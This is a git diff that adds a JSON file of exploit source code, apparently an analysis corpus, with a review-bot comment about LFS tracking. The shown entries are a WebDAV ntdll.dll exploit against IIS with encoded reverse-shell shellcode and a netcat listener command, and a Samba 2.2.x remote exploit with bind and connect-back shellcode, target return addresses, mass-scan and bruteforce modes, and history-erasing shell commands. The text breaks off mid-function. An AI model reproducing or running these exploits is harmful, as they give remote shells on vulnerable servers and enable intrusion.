diff --git a/.gitattributes b/.gitattributes
index a6344aac8c09253b3b630fb776ae94478aa0275b..866ce68025f990030736d0b4aff4c8aa4ff64e51 100644
--- a/.gitattributes
+++ b/.gitattributes
@@ -33,3 +33,4 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text
 *.zip filter=lfs diff=lfs merge=lfs -text
 *.zst filter=lfs diff=lfs merge=lfs -text
 *tfevents* filter=lfs diff=lfs merge=lfs -text
+code_analysis_dataset.csv filter=lfs diff=lfs merge=lfs -text
diff --git a/code_analysis_dataset.csv b/code_analysis_dataset.csv
new file mode 100644
index 0000000000000000000000000000000000000000..f92ca24af2cbf2646bcb792c724b714fed4a008a
--- /dev/null
+++ b/code_analysis_dataset.csv
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f9fb83acd5511b7c7d8d9788388c55f2379da13e0921796787695922f2ef4f6d
+size 11946655
diff --git a/exploit-analyzer/compiled_exploits.json b/exploit-analyzer/compiled_exploits.json
new file mode 100644
index 0000000000000000000000000000000000000000..067efa75f4bc58bda1d967b0af107cda03699488
--- /dev/null
+++ b/exploit-analyzer/compiled_exploits.json
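Review bot: The new LFS rule on the added line covers only `code_analysis_dataset.csv`, while `exploit-analyzer/compiled_exploits.json` (5342 lines, added by the same commit) matches none of the patterns visible here and is committed as a plain blob. If that JSON is a generated dataset, as its name and size suggest, track it the same way, e.g. `exploit-analyzer/compiled_exploits.json filter=lfs diff=lfs merge=lfs -text`, so both datasets are handled consistently and the large generated file is not baked into history. Because the JSON embeds raw exploit source as string values, it is also likely to be flagged by content or malware scanners on the hosting side; a short note on the file's provenance and intended use (analysis corpus) next to it would help reviewers and tooling.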
@@ -0,0 +1,5342 @@ +[ + { + "exploit_id": 1, + "content": "/*******************************************************************/\n\n/* [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] */\n\n/* --------------------------------------------------------------- */\n\n/* this is the exploit for ntdll.dll through WebDAV. */\n\n/* run a netcat ex: nc -L -vv -p 666 */\n\n/* wb server.com your_ip 666 0 */\n\n/* the shellcode is a reverse remote shell */\n\n/* you need to pad a bit.. the best way I think is launching */\n\n/* the exploit with pad = 0 and after that, the server will be */\n\n/* down for a couple of seconds, now retry with pad at 1 */\n\n/* and so on..pad 2.. pad 3.. if you haven't the shell after */\n\n/* something like pad at 10 I think you better to restart from */\n\n/* pad at 0. On my local IIS the pad was at 1 (0x00110011) but */\n\n/* on all the others servers it was at 2,3,4, etc..sometimes */\n\n/* you can have the force with you, and get the shell in 1 try */\n\n/* sometimes you need to pad more than 10 times ;) */\n\n/* the shellcode was coded by myself, it is SEH + ScanMem to */\n\n/* find the famous offsets (GetProcAddress).. 
*/\n\n/* */\n\n/*******************************************************************/\n\n\n\n\n\n#include \n\n#include \n\n#include \n\n\n\n#pragma comment (lib,\"ws2_32\")\n\n\n\nchar shellc0de[] =\n\n\"\\x55\\x8b\\xec\\x33\\xc9\\x53\\x56\\x57\\x8d\\x7d\\xa2\\xb1\\x25\\xb8\\xcc\\xcc\"\n\n\"\\xcc\\xcc\\xf3\\xab\\xeb\\x09\\xeb\\x0c\\x58\\x5b\\x59\\x5a\\x5c\\x5d\\xc3\\xe8\"\n\n\"\\xf2\\xff\\xff\\xff\\x5b\\x80\\xc3\\x10\\x33\\xc9\\x66\\xb9\\xb5\\x01\\x80\\x33\"\n\n\"\\x95\\x43\\xe2\\xfa\\x66\\x83\\xeb\\x67\\xfc\\x8b\\xcb\\x8b\\xf3\\x66\\x83\\xc6\"\n\n\"\\x46\\xad\\x56\\x40\\x74\\x16\\x55\\xe8\\x13\\x00\\x00\\x00\\x8b\\x64\\x24\\x08\"\n\n\"\\x64\\x8f\\x05\\x00\\x00\\x00\\x00\\x58\\x5d\\x5e\\xeb\\xe5\\x58\\xeb\\xb9\\x64\"\n\n\"\\xff\\x35\\x00\\x00\\x00\\x00\\x64\\x89\\x25\\x00\\x00\\x00\\x00\\x48\\x66\\x81\"\n\n\"\\x38\\x4d\\x5a\\x75\\xdb\\x64\\x8f\\x05\\x00\\x00\\x00\\x00\\x5d\\x5e\\x8b\\xe8\"\n\n\"\\x03\\x40\\x3c\\x8b\\x78\\x78\\x03\\xfd\\x8b\\x77\\x20\\x03\\xf5\\x33\\xd2\\x8b\"\n\n\"\\x06\\x03\\xc5\\x81\\x38\\x47\\x65\\x74\\x50\\x75\\x25\\x81\\x78\\x04\\x72\\x6f\"\n\n\"\\x63\\x41\\x75\\x1c\\x81\\x78\\x08\\x64\\x64\\x72\\x65\\x75\\x13\\x8b\\x47\\x24\"\n\n\"\\x03\\xc5\\x0f\\xb7\\x1c\\x50\\x8b\\x47\\x1c\\x03\\xc5\\x8b\\x1c\\x98\\x03\\xdd\"\n\n\"\\x83\\xc6\\x04\\x42\\x3b\\x57\\x18\\x75\\xc6\\x8b\\xf1\\x56\\x55\\xff\\xd3\\x83\"\n\n\"\\xc6\\x0f\\x89\\x44\\x24\\x20\\x56\\x55\\xff\\xd3\\x8b\\xec\\x81\\xec\\x94\\x00\"\n\n\"\\x00\\x00\\x83\\xc6\\x0d\\x56\\xff\\xd0\\x89\\x85\\x7c\\xff\\xff\\xff\\x89\\x9d\"\n\n\"\\x78\\xff\\xff\\xff\\x83\\xc6\\x0b\\x56\\x50\\xff\\xd3\\x33\\xc9\\x51\\x51\\x51\"\n\n\"\\x51\\x41\\x51\\x41\\x51\\xff\\xd0\\x89\\x85\\x94\\x00\\x00\\x00\\x8b\\x85\\x7c\"\n\n\"\\xff\\xff\\xff\\x83\\xc6\\x0b\\x56\\x50\\xff\\xd3\\x83\\xc6\\x08\\x6a\\x10\\x56\"\n\n\"\\x8b\\x8d\\x94\\x00\\x00\\x00\\x51\\xff\\xd0\\x33\\xdb\\xc7\\x45\\x8c\\x44\\x00\"\n\n\"\\x00\\x00\\x89\\x5d\\x90\\x89\\x5d\\x94\\x89\\x5d\\x98\\x89\\x5d\\x9c\\x89\\x5d\"\n\n\"\\xa0\\x89\\x5d\\xa4\\x89\\x5d\\xa8\\
xc7\\x45\\xb8\\x01\\x01\\x00\\x00\\x89\\x5d\"\n\n\"\\xbc\\x89\\x5d\\xc0\\x8b\\x9d\\x94\\x00\\x00\\x00\\x89\\x5d\\xc4\\x89\\x5d\\xc8\"\n\n\"\\x89\\x5d\\xcc\\x8d\\x45\\xd0\\x50\\x8d\\x4d\\x8c\\x51\\x6a\\x00\\x6a\\x00\\x6a\"\n\n\"\\x00\\x6a\\x01\\x6a\\x00\\x6a\\x00\\x83\\xc6\\x09\\x56\\x6a\\x00\\x8b\\x45\\x20\"\n\n\"\\xff\\xd0\"\n\n\"CreateProcessA\\x00LoadLibraryA\\x00ws2_32.dll\\x00WSASocketA\\x00\"\n\n\"connect\\x00\\x02\\x00\\x02\\x9A\\xC0\\xA8\\x01\\x01\\x00\"\n\n\"cmd\" // don't change anything..\n\n\"\\x00\\x00\\xe7\\x77\" // offsets of kernel32.dll for some win ver..\n\n\"\\x00\\x00\\xe8\\x77\"\n\n\"\\x00\\x00\\xf0\\x77\"\n\n\"\\x00\\x00\\xe4\\x77\"\n\n\"\\x00\\x88\\x3e\\x04\" // win2k3\n\n\"\\x00\\x00\\xf7\\xbf\" // win9x =P\n\n\"\\xff\\xff\\xff\\xff\";\n\n\n\nint test_host(char *host)\n\n{\n\nchar search[100]=\"\";\n\nint sock;\n\nstruct hostent *heh;\n\nstruct sockaddr_in hmm;\n\nchar buf[100] =\"\";\n\n\n\nif(strlen(host)>60) {\n\nprintf(\"error: victim host too long.\\r\\n\");\n\nreturn 1;\n\n}\n\n\n\nif ((heh = gethostbyname(host))==0){\n\nprintf(\"error: can't resolve '%s'\",host);\n\nreturn 1;\n\n}\n\n\n\nsprintf(search,\"SEARCH / HTTP/1.1\\r\\nHost: %s\\r\\n\\r\\n\",host);\n\nhmm.sin_port = htons(80);\n\nhmm.sin_family = AF_INET;\n\nhmm.sin_addr = *((struct in_addr *)heh->h_addr);\n\n\n\nif ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){\n\nprintf(\"error: can't create socket\");\n\nreturn 1;\n\n}\n\n\n\nprintf(\"Checking WebDav on '%s' ... 
\",host);\n\n\n\nif ((connect(sock, (struct sockaddr *) &hmm, sizeof(hmm))) == -1){\n\nprintf(\"CONNECTING_ERROR\\r\\n\");\n\nreturn 1;\n\n}\n\nsend(sock,search,strlen(search),0);\n\nrecv(sock,buf,sizeof(buf),0);\n\nif(buf[9]=='4'&&buf[10]=='1'&&buf[11]=='1')\n\nreturn 0;\n\nprintf(\"NOT FOUND\\r\\n\");\n\nreturn 1;\n\n}\n\n\n\nvoid help(char *program)\n\n{\n\nprintf(\"syntax: %s [padding]\\r\\n\",program);\n\nreturn;\n\n}\n\n\n\nvoid banner(void)\n\n{\n\nprintf(\"\\r\\n\\t [Crpt] ntdll.dll exploit trough WebDAV by kralor\n\n[Crpt]\\r\\n\");\n\nprintf(\"\\t\\twww.coromputer.net && undernet #coromputer\\r\\n\\r\\n\");\n\nreturn;\n\n}\n\n\n\nvoid main(int argc, char *argv[])\n\n{\n\nWSADATA wsaData;\n\nunsigned short port=0;\n\nchar *port_to_shell=\"\", *ip1=\"\", data[50]=\"\";\n\nunsigned int i,j;\n\nunsigned int ip = 0 ;\n\nint s, PAD=0x10;\n\nstruct hostent *he;\n\nstruct sockaddr_in crpt;\n\nchar buffer[65536] =\"\";\n\nchar request[80000]; // huuuh, what a mess! :)\n\nchar content[] =\n\n\"\\r\\n\"\n\n\"\\r\\n\"\n\n\"\\r\\n\"\n\n\"Select \\\"DAV:displayname\\\" from scope()\\r\\n\"\n\n\"\\r\\n\"\n\n\"\\r\\n\";\n\n\n\nbanner();\n\nif((argc<4)||(argc>5)) {\n\nhelp(argv[0]);\n\nreturn;\n\n}\n\n\n\nif(WSAStartup(0x0101,&wsaData)!=0) {\n\nprintf(\"error starting winsock..\");\n\nreturn;\n\n}\n\n\n\nif(test_host(argv[1]))\n\nreturn;\n\n\n\nif(argc==5)\n\nPAD+=atoi(argv[4]);\n\n\n\nprintf(\"FOUND\\r\\nexploiting ntdll.dll through WebDav [ret: 0x00%02x00%02x]\\r\\n\",PAD,PAD);\n\n\n\nip = inet_addr(argv[2]); ip1 = (char*)&ip;\n\n\n\nshellc0de[448]=ip1[0]; shellc0de[449]=ip1[1]; shellc0de[450]=ip1[2];\n\nshellc0de[451]=ip1[3];\n\n\n\nport = htons(atoi(argv[3]));\n\nport_to_shell = (char *) &port;\n\nshellc0de[446]=port_to_shell[0];\n\nshellc0de[447]=port_to_shell[1];\n\n\n\n// we xor the shellcode [xored by 0x95 to avoid bad chars]\n\n__asm {\n\nlea eax, shellc0de\n\nadd eax, 0x34\n\nxor ecx, ecx\n\nmov cx, 0x1b0\n\nwah:\n\nxor byte ptr[eax], 0x95\n\ninc eax\n\nloop 
wah\n\n}\n\n\n\nif ((he = gethostbyname(argv[1]))==0){\n\nprintf(\"error: can't resolve '%s'\",argv[1]);\n\nreturn;\n\n}\n\n\n\ncrpt.sin_port = htons(80);\n\ncrpt.sin_family = AF_INET;\n\ncrpt.sin_addr = *((struct in_addr *)he->h_addr);\n\n\n\nif ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){\n\nprintf(\"error: can't create socket\");\n\nreturn;\n\n}\n\n\n\nprintf(\"Connecting... \");\n\n\n\nif ((connect(s, (struct sockaddr *) &crpt, sizeof(crpt))) == -1){\n\nprintf(\"ERROR\\r\\n\");\n\nreturn;\n\n}\n\n// No Operation.\n\nfor(i=0;i\n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n\n\ntypedef struct {\n\n unsigned char type;\n\n unsigned char flags;\n\n unsigned short length;\n\n} NETBIOS_HEADER;\n\n\n\ntypedef struct {\n\n unsigned char protocol[4];\n\n unsigned char command;\n\n unsigned short status;\n\n unsigned char reserved;\n\n unsigned char flags;\n\n unsigned short flags2;\n\n unsigned char pad[12];\n\n unsigned short tid;\n\n unsigned short pid;\n\n unsigned short uid;\n\n unsigned short mid;\n\n} SMB_HEADER;\n\n\n\nint OWNED = 0;\n\npid_t childs[100];\n\nstruct sockaddr_in addr1;\n\nstruct sockaddr_in addr2;\n\n\n\nchar linux_bindcode[] =\n\n \"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x51\\xb1\\x06\\x51\\xb1\\x01\\x51\\xb1\\x02\\x51\"\n\n \"\\x89\\xe1\\xb3\\x01\\xb0\\x66\\xcd\\x80\\x89\\xc1\\x31\\xc0\\x31\\xdb\\x50\\x50\"\n\n \"\\x50\\x66\\x68\\xb0\\xef\\xb3\\x02\\x66\\x53\\x89\\xe2\\xb3\\x10\\x53\\xb3\\x02\"\n\n \"\\x52\\x51\\x89\\xca\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x31\\xdb\\x39\\xc3\\x74\\x05\"\n\n \"\\x31\\xc0\\x40\\xcd\\x80\\x31\\xc0\\x50\\x52\\x89\\xe1\\xb3\\x04\\xb0\\x66\\xcd\"\n\n \"\\x80\\x89\\xd7\\x31\\xc0\\x31\\xdb\\x31\\xc9\\xb3\\x11\\xb1\\x01\\xb0\\x30\\xcd\"\n\n \"\\x80\\x31\\xc0\\x31\\xdb\\x50\\x50\\x57\\x89\\xe1\\xb3\\x05\\xb0\\x66\\xcd\\x80\"\n\n 
\"\\x89\\xc6\\x31\\xc0\\x31\\xdb\\xb0\\x02\\xcd\\x80\\x39\\xc3\\x75\\x40\\x31\\xc0\"\n\n \"\\x89\\xfb\\xb0\\x06\\xcd\\x80\\x31\\xc0\\x31\\xc9\\x89\\xf3\\xb0\\x3f\\xcd\\x80\"\n\n \"\\x31\\xc0\\x41\\xb0\\x3f\\xcd\\x80\\x31\\xc0\\x41\\xb0\\x3f\\xcd\\x80\\x31\\xc0\"\n\n \"\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x8b\\x54\\x24\"\n\n \"\\x08\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\x40\\xcd\\x80\\x31\\xc0\"\n\n \"\\x89\\xf3\\xb0\\x06\\xcd\\x80\\xeb\\x99\";\n\n\n\nchar bsd_bindcode[] =\n\n \"\\x31\\xc0\\x31\\xdb\\x53\\xb3\\x06\\x53\\xb3\\x01\\x53\\xb3\\x02\\x53\\x54\\xb0\"\n\n \"\\x61\\xcd\\x80\\x89\\xc7\\x31\\xc0\\x50\\x50\\x50\\x66\\x68\\xb0\\xef\\xb7\\x02\"\n\n \"\\x66\\x53\\x89\\xe1\\x31\\xdb\\xb3\\x10\\x53\\x51\\x57\\x50\\xb0\\x68\\xcd\\x80\"\n\n \"\\x31\\xdb\\x39\\xc3\\x74\\x06\\x31\\xc0\\xb0\\x01\\xcd\\x80\\x31\\xc0\\x50\\x57\"\n\n \"\\x50\\xb0\\x6a\\xcd\\x80\\x31\\xc0\\x31\\xdb\\x50\\x89\\xe1\\xb3\\x01\\x53\\x89\"\n\n \"\\xe2\\x50\\x51\\x52\\xb3\\x14\\x53\\x50\\xb0\\x2e\\xcd\\x80\\x31\\xc0\\x50\\x50\"\n\n \"\\x57\\x50\\xb0\\x1e\\xcd\\x80\\x89\\xc6\\x31\\xc0\\x31\\xdb\\xb0\\x02\\xcd\\x80\"\n\n \"\\x39\\xc3\\x75\\x44\\x31\\xc0\\x57\\x50\\xb0\\x06\\xcd\\x80\\x31\\xc0\\x50\\x56\"\n\n \"\\x50\\xb0\\x5a\\xcd\\x80\\x31\\xc0\\x31\\xdb\\x43\\x53\\x56\\x50\\xb0\\x5a\\xcd\"\n\n \"\\x80\\x31\\xc0\\x43\\x53\\x56\\x50\\xb0\\x5a\\xcd\\x80\\x31\\xc0\\x50\\x68\\x2f\"\n\n \"\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x54\\x53\\x50\\xb0\\x3b\"\n\n \"\\xcd\\x80\\x31\\xc0\\xb0\\x01\\xcd\\x80\\x31\\xc0\\x56\\x50\\xb0\\x06\\xcd\\x80\"\n\n \"\\xeb\\x9a\";\n\n\n\nchar linux_connect_back[] =\n\n \"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x51\\xb1\\x06\\x51\\xb1\\x01\\x51\\xb1\\x02\\x51\"\n\n \"\\x89\\xe1\\xb3\\x01\\xb0\\x66\\xcd\\x80\\x89\\xc2\\x31\\xc0\\x31\\xc9\\x51\\x51\"\n\n \"\\x68\\x41\\x42\\x43\\x44\\x66\\x68\\xb0\\xef\\xb1\\x02\\x66\\x51\\x89\\xe7\\xb3\"\n\n 
\"\\x10\\x53\\x57\\x52\\x89\\xe1\\xb3\\x03\\xb0\\x66\\xcd\\x80\\x31\\xc9\\x39\\xc1\"\n\n \"\\x74\\x06\\x31\\xc0\\xb0\\x01\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\xcd\\x80\"\n\n \"\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\xb1\\x01\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\x89\\xd3\"\n\n \"\\xb1\\x02\\xcd\\x80\\x31\\xc0\\x31\\xd2\\x50\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\"\n\n \"\\x2f\\x62\\x69\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\xb0\"\n\n \"\\x01\\xcd\\x80\"; \n\n\n\nchar bsd_connect_back[] =\n\n \"\\x31\\xc0\\x31\\xdb\\x53\\xb3\\x06\\x53\\xb3\\x01\\x53\\xb3\\x02\\x53\\x54\\xb0\"\n\n \"\\x61\\xcd\\x80\\x31\\xd2\\x52\\x52\\x68\\x41\\x41\\x41\\x41\\x66\\x68\\xb0\\xef\"\n\n \"\\xb7\\x02\\x66\\x53\\x89\\xe1\\xb2\\x10\\x52\\x51\\x50\\x52\\x89\\xc2\\x31\\xc0\"\n\n \"\\xb0\\x62\\xcd\\x80\\x31\\xdb\\x39\\xc3\\x74\\x06\\x31\\xc0\\xb0\\x01\\xcd\\x80\"\n\n \"\\x31\\xc0\\x50\\x52\\x50\\xb0\\x5a\\xcd\\x80\\x31\\xc0\\x31\\xdb\\x43\\x53\\x52\"\n\n \"\\x50\\xb0\\x5a\\xcd\\x80\\x31\\xc0\\x43\\x53\\x52\\x50\\xb0\\x5a\\xcd\\x80\\x31\"\n\n \"\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x54\"\n\n \"\\x53\\x50\\xb0\\x3b\\xcd\\x80\\x31\\xc0\\xb0\\x01\\xcd\\x80\";\n\n\n\n\n\n\n\nstruct {\n\n char *type;\n\n unsigned long ret;\n\n char *shellcode;\n\n int os_type; /* 0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD non-exec stack */\n\n\n\n} targets[] = {\n\n { \"samba-2.2.x - Debian 3.0 \", 0xbffffea2, linux_bindcode, 0 },\n\n { \"samba-2.2.x - Gentoo 1.4.x \", 0xbfffe890, linux_bindcode, 0 },\n\n { \"samba-2.2.x - Mandrake 8.x \", 0xbffff6a0, linux_bindcode, 0 },\n\n { \"samba-2.2.x - Mandrake 9.0 \", 0xbfffe638, linux_bindcode, 0 },\n\n { \"samba-2.2.x - Redhat 9.0 \", 0xbffff7cc, linux_bindcode, 0 },\n\n { \"samba-2.2.x - Redhat 8.0 \", 0xbffff2f0, linux_bindcode, 0 },\n\n { \"samba-2.2.x - Redhat 7.x \", 0xbffff310, linux_bindcode, 0 },\n\n { \"samba-2.2.x - Redhat 6.x \", 0xbffff2f0, linux_bindcode, 0 },\n\n { \"samba-2.2.x - Slackware 9.0 \", 0xbffff574, 
linux_bindcode, 0 },\n\n { \"samba-2.2.x - Slackware 8.x \", 0xbffff574, linux_bindcode, 0 },\n\n { \"samba-2.2.x - SuSE 7.x \", 0xbffffbe6, linux_bindcode, 0 }, \n\n { \"samba-2.2.x - SuSE 8.x \", 0xbffff8f8, linux_bindcode, 0 },\n\n { \"samba-2.2.x - FreeBSD 5.0 \", 0xbfbff374, bsd_bindcode, 1 },\n\n { \"samba-2.2.x - FreeBSD 4.x \", 0xbfbff374, bsd_bindcode, 1 },\n\n { \"samba-2.2.x - NetBSD 1.6 \", 0xbfbfd5d0, bsd_bindcode, 1 },\n\n { \"samba-2.2.x - NetBSD 1.5 \", 0xbfbfd520, bsd_bindcode, 1 },\n\n { \"samba-2.2.x - OpenBSD 3.2 \", 0x00159198, bsd_bindcode, 2 },\n\n { \"samba-2.2.8 - OpenBSD 3.2 (package)\", 0x001dd258, bsd_bindcode, 2 },\n\n { \"samba-2.2.7 - OpenBSD 3.2 (package)\", 0x001d9230, bsd_bindcode, 2 },\n\n { \"samba-2.2.5 - OpenBSD 3.2 (package)\", 0x001d6170, bsd_bindcode, 2 },\n\n { \"Crash (All platforms) \", 0xbade5dee, linux_bindcode, 0 },\n\n};\n\n\n\nvoid shell();\n\nvoid usage();\n\nvoid handler();\n\n\n\nint is_samba(char *ip, unsigned long time_out);\n\nint Connect(int fd, char *ip, unsigned int port, unsigned int time_out);\n\nint read_timer(int fd, unsigned int time_out);\n\nint write_timer(int fd, unsigned int time_out);\n\nint start_session(int sock);\n\nint exploit_normal(int sock, unsigned long ret, char *shellcode);\n\nint exploit_openbsd32(int sock, unsigned long ret, char *shellcode);\n\n\n\nvoid usage(char *prog)\n\n{\n\n fprintf(stderr, \"Usage: %s [-bBcCdfprsStv] [host]\\n\\n\"\n\n \"-b bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)\\n\"\n\n \"-B bruteforce steps (default = 300)\\n\"\n\n \"-c connectback ip address\\n\"\n\n \"-C max childs for scan/bruteforce mode (default = 40)\\n\"\n\n \"-d bruteforce/scanmode delay in micro seconds (default = 100000)\\n\"\n\n \"-f force\\n\" \n\n \"-p port to attack (default = 139)\\n\"\n\n \"-r return address\\n\"\n\n \"-s scan mode (random)\\n\"\n\n \"-S scan mode\\n\"\n\n \"-t presets (0 for a list)\\n\" \n\n \"-v verbose mode\\n\\n\", prog);\n\n 
\n\n exit(1);\n\n}\n\n\n\nint is_samba(char *ip, unsigned long time_out)\n\n{\n\n char\n\n nbtname[]= /* netbios name packet */\n\n {\n\n 0x80,0xf0,0x00,0x10,0x00,0x01,0x00,0x00,\n\n 0x00,0x00,0x00,0x00,0x20,0x43,0x4b,0x41,\n\n 0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,\n\n 0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,\n\n 0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,\n\n 0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21,\n\n 0x00,0x01\n\n };\n\n\n\n unsigned char recv_buf[1024];\n\n unsigned char *ptr;\n\n\n\n int i = 0;\n\n int s = 0;\n\n\n\n unsigned int total = 0;\n\n\n\n if ((s = socket(PF_INET, SOCK_DGRAM, 17)) <= 0) return -1;\n\n\n\n if(Connect(s, ip, 137, time_out) == -1) {\n\n close(s);\n\n return -1;\n\n } \n\n\n\n memset(recv_buf, 0x00, sizeof(recv_buf));\n\n\n\n if(write_timer(s, time_out) == 1) {\n\n if (write(s, nbtname, sizeof(nbtname)) <= 0) {\n\n close(s);\n\n return -1;\n\n }\n\n }\n\n\n\n if (read_timer(s, time_out) == 1) {\n\n if (read(s, recv_buf, sizeof(recv_buf)) <= 0) {\n\n close(s);\n\n return -1;\n\n }\n\n\n\n ptr = recv_buf + 57;\n\n total = *(ptr - 1); /* max names */\n\n\n\n while(ptr < recv_buf + sizeof(recv_buf)) {\n\n ptr += 18;\n\n if (i == total) {\n\n\n\n ptr -= 19; \n\n\n\n if ( *(ptr + 1) == 0x00 && *(ptr + 2) == 0x00 && *(ptr + 3) == 0x00 &&\n\n *(ptr + 4) == 0x00 && *(ptr + 5) == 0x00 && *(ptr + 6) == 0x00) {\n\n close(s);\n\n return 0;\n\n }\n\n\n\n close(s);\n\n return 1;\n\n }\n\n\n\n i++; \n\n }\n\n\n\n }\n\n close(s);\n\n return -1;\n\n}\n\n\n\nint Connect(int fd, char *ip, unsigned int port, unsigned int time_out) \n\n{\n\n /* ripped from no1 */\n\n\n\n int flags;\n\n int select_status;\n\n fd_set connect_read, connect_write;\n\n struct timeval timeout;\n\n int getsockopt_length = 0;\n\n int getsockopt_error = 0;\n\n struct sockaddr_in server;\n\n bzero(&server, sizeof(server));\n\n server.sin_family = AF_INET;\n\n inet_pton(AF_INET, ip, &server.sin_addr);\n\n server.sin_port = htons(port);\n\n\n\n if((flags = fcntl(fd, F_GETFL, 0)) < 0) 
{\n\n close(fd);\n\n return -1;\n\n }\n\n \n\n if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {\n\n close(fd);\n\n return -1;\n\n }\n\n \n\n timeout.tv_sec = time_out;\n\n timeout.tv_usec = 0;\n\n FD_ZERO(&connect_read);\n\n FD_ZERO(&connect_write);\n\n FD_SET(fd, &connect_read);\n\n FD_SET(fd, &connect_write);\n\n\n\n if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0) {\n\n if(errno != EINPROGRESS) {\n\n close(fd);\n\n return -1;\n\n }\n\n }\n\n else {\n\n if(fcntl(fd, F_SETFL, flags) < 0) {\n\n close(fd);\n\n return -1;\n\n }\n\n \n\n return 1;\n\n\n\n }\n\n\n\n select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout);\n\n\n\n if(select_status == 0) {\n\n close(fd);\n\n return -1;\n\n\n\n }\n\n\n\n if(select_status == -1) {\n\n close(fd);\n\n return -1;\n\n }\n\n\n\n if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write)) {\n\n if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write))\n\n {\n\n getsockopt_length = sizeof(getsockopt_error);\n\n\n\n if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0) {\n\n errno = ETIMEDOUT;\n\n close(fd);\n\n return -1;\n\n }\n\n\n\n if(getsockopt_error == 0) {\n\n if(fcntl(fd, F_SETFL, flags) < 0) {\n\n close(fd);\n\n return -1;\n\n }\n\n return 1;\n\n } \n\n\n\n else {\n\n errno = getsockopt_error;\n\n close(fd);\n\n return (-1);\n\n }\n\n\n\n }\n\n }\n\n else {\n\n close(fd);\n\n return 1;\n\n }\n\n\n\n if(fcntl(fd, F_SETFL, flags) < 0) {\n\n close(fd);\n\n return -1;\n\n }\n\n return 1;\n\n}\n\n\n\nint read_timer(int fd, unsigned int time_out)\n\n{\n\n\n\n /* ripped from no1 */\n\n\n\n int flags;\n\n int select_status;\n\n fd_set fdread;\n\n struct timeval timeout;\n\n\n\n if((flags = fcntl(fd, F_GETFL, 0)) < 0) {\n\n close(fd);\n\n return (-1);\n\n }\n\n\n\n if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {\n\n close(fd);\n\n return (-1);\n\n }\n\n\n\n timeout.tv_sec = time_out;\n\n timeout.tv_usec = 0;\n\n FD_ZERO(&fdread);\n\n FD_SET(fd, 
&fdread);\n\n select_status = select(fd + 1, &fdread, NULL, NULL, &timeout);\n\n\n\n if(select_status == 0) {\n\n close(fd);\n\n return (-1);\n\n }\n\n\n\n if(select_status == -1) {\n\n close(fd);\n\n return (-1);\n\n }\n\n \n\n if(FD_ISSET(fd, &fdread)) {\n\n \n\n if(fcntl(fd, F_SETFL, flags) < 0) {\n\n close(fd);\n\n return -1;\n\n }\n\n \n\n return 1;\n\n\n\n } \n\n else {\n\n close(fd);\n\n return 1;\n\n\n\n }\n\n}\n\n\n\nint write_timer(int fd, unsigned int time_out)\n\n{\n\n\n\n /* ripped from no1 */\n\n\n\n int flags;\n\n int select_status;\n\n fd_set fdwrite;\n\n struct timeval timeout;\n\n\n\n if((flags = fcntl(fd, F_GETFL, 0)) < 0) { \n\n close(fd);\n\n return (-1);\n\n }\n\n\n\n if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {\n\n close(fd);\n\n return (-1);\n\n }\n\n \n\n timeout.tv_sec = time_out;\n\n timeout.tv_usec = 0;\n\n FD_ZERO(&fdwrite);\n\n FD_SET(fd, &fdwrite);\n\n\n\n select_status = select(fd + 1, NULL, &fdwrite, NULL, &timeout);\n\n\n\n if(select_status == 0) {\n\n close(fd);\n\n return -1;\n\n }\n\n\n\n if(select_status == -1) {\n\n close(fd);\n\n return -1;\n\n }\n\n\n\n if(FD_ISSET(fd, &fdwrite)) {\n\n if(fcntl(fd, F_SETFL, flags) < 0) {\n\n close(fd);\n\n return -1;\n\n }\n\n return 1;\n\n }\n\n else { \n\n close(fd);\n\n return -1;\n\n }\n\n}\n\n\n\n\n\nvoid shell(int sock)\n\n{\n\n fd_set fd_read;\n\n char buff[1024], *cmd=\"unset HISTFILE; echo \\\"*** JE MOET JE MUIL HOUWE\\\";uname -a;id;\\n\";\n\n int n;\n\n\n\n FD_ZERO(&fd_read);\n\n FD_SET(sock, &fd_read);\n\n FD_SET(0, &fd_read);\n\n\n\n send(sock, cmd, strlen(cmd), 0);\n\n\n\n while(1) {\n\n FD_SET(sock,&fd_read);\n\n FD_SET(0,&fd_read);\n\n\n\n if (select(FD_SETSIZE, &fd_read, NULL, NULL, NULL) < 0 ) break;\n\n\n\n if (FD_ISSET(sock, &fd_read)) {\n\n\n\n if((n = recv(sock, buff, sizeof(buff), 0)) < 0){\n\n 